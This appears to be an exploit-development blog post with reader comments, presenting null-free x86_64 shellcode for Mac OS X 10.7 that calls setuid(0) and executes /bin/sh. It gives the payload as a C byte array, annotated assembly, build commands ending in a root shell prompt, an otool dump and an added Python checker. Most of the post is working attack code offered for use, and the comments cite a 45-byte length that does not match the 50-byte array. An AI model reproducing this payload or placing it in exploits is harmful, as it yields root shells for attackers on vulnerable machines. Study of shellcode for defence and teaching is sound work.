More small shellcode, this time tested and verified working on OS X 10.7.
Shellcode
```c
/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *
 * Created on: Apr 12, 2012
 * Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
    "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
    "\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
    "\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
    "\x0f\x05";
```
Source
```nasm
; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64
section .text
global start

start:
    mov r8b, 0x02               ; Unix class system calls = 2
    shl r8, 24                  ; shift left 24 into the high-order bits
    or r8, 0x17                 ; setuid = 23, OR with class = 0x2000017
    xor edi, edi                ; zero out edi, uid = 0
    mov rax, r8                 ; syscall number in rax (i.e. mov rax, 0x2000017)
    syscall                     ; invoke kernel

    add r8, 0x24                ; 0x24 + r8 = 0x200003b (execve = 59)
    mov rax, r8                 ; syscall number in rax (i.e. mov rax, 0x200003b)
    xor rdx, rdx                ; zero out rdx: null terminator, and envp = NULL
    mov rdi, 0x68732f2f6e69622f ; /bin//sh in hex
    push rdx                    ; push backwards, null terminator for the string
    push rdi                    ; the 8 bytes of /bin//sh
    mov rdi, rsp                ; null terminated /bin//sh pointer (argv[0], path)
    push rdx                    ; push backwards, null terminator for argv
    push rdi                    ; address of /bin//sh
    mov rsi, rsp                ; argv pointer: {"/bin//sh", NULL}
    syscall                     ; invoke kernel
```
To test:
```
dustin@sholtz:~/$ nasm -f macho64 shell.s
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out
bash-3.2#
```
Bytes from otool:
```
dustin@sholtz:~/$ otool -t a.out
a.out:
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6
0000000100000fb6 0f 05
```
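As an added check (not part of the original post), the Python script below decodes the (class << 24) | number convention the listing builds in r8, and verifies the published C string against the otool dump: same bytes, no null byte, and total length. The sample inputs are copied from the post; the two BSD syscall names come from sys/syscall.h on OS X.

```python
import re

# Darwin builds the syscall number as (class << 24) | BSD number; the listing does
# this with "mov r8b, 2; shl r8, 24; or r8, 0x17" to reach 0x2000017 (setuid).
CLASS_SHIFT = 24
CLASS_UNIX = 2
BSD_NAMES = {23: "setuid", 59: "execve"}  # the two numbers the listing uses

def darwin_syscall(number, cls=CLASS_UNIX):
    """rax value for a BSD syscall number in the given class."""
    return (cls << CLASS_SHIFT) | number

def decode_darwin_syscall(rax):
    """Split a Darwin rax value into (class, BSD number, name) for triage."""
    cls, num = rax >> CLASS_SHIFT, rax & ((1 << CLASS_SHIFT) - 1)
    return cls, num, BSD_NAMES.get(num, "unknown")

def parse_c_string(src):
    """Decode the \\xNN escapes of a C string literal into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", src))

def parse_otool(dump):
    """Collect hex bytes from 'otool -t' lines of the form '<16-hex-digit addr> b0 b1 ...'."""
    out = bytearray()
    for line in dump.splitlines():
        f = line.split()
        if len(f) > 1 and re.fullmatch(r"[0-9a-f]{16}", f[0]):
            out.extend(int(b, 16) for b in f[1:])
    return bytes(out)

def check_shellcode(c_literal, otool_dump):
    """Return (matches the assembled bytes, null-free, length in bytes)."""
    sc = parse_c_string(c_literal)
    return sc == parse_otool(otool_dump), b"\x00" not in sc, len(sc)

# Inputs copied from the post: the C array and the otool -t dump.
C_LITERAL = r'''"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05"'''
OTOOL_DUMP = """a.out:
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6
0000000100000fb6 0f 05"""

if __name__ == "__main__":
    print(check_shellcode(C_LITERAL, OTOOL_DUMP))  # (True, True, 50)
    print(hex(darwin_syscall(23)), decode_darwin_syscall(0x200003B))
```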
Enjoy!

Hi! Thanks for your work, but I have a problem. When I execute the a.out file I get the following error: "Bad system call".

```
~/Desktop/Overflow$ ld -arch x86_64 setuid_shell_x86_64.o
~/Desktop/Overflow$ ./a.out
Bad system call
```

But the otool output is correct, and when I test it in the way you explain in the next post, there is no problem, and the shell runs perfectly. Have you any thought about this unexpected behaviour? I would like to know what's happening with the a.out file. Thank you for the blog, it's very interesting and didactic.
Messi, I had the wrong implementation. I’ve updated and it should work now. Sorry
Thank you so much for this sharing.
I put this byte shellcode into the test template you provide at "Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap", and changed the size to 0x2d (45 in decimal).
But I get "Segmentation fault: 11".
I am using Mac OS X 10.7.2 lion. I can successfully reproduce the example of “Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap”.
Do I miss something? Can you test this 45 bytes shellcode with your template?
Sincerely looking forward to your reply.
Thanks for pointing this out. It worked correctly in nasm – spawning a new shell but you’re absolutely right, it doesn’t work with the shellcode template. I’ve updated it by making rsi a valid pointer like you pointed out. Thanks again!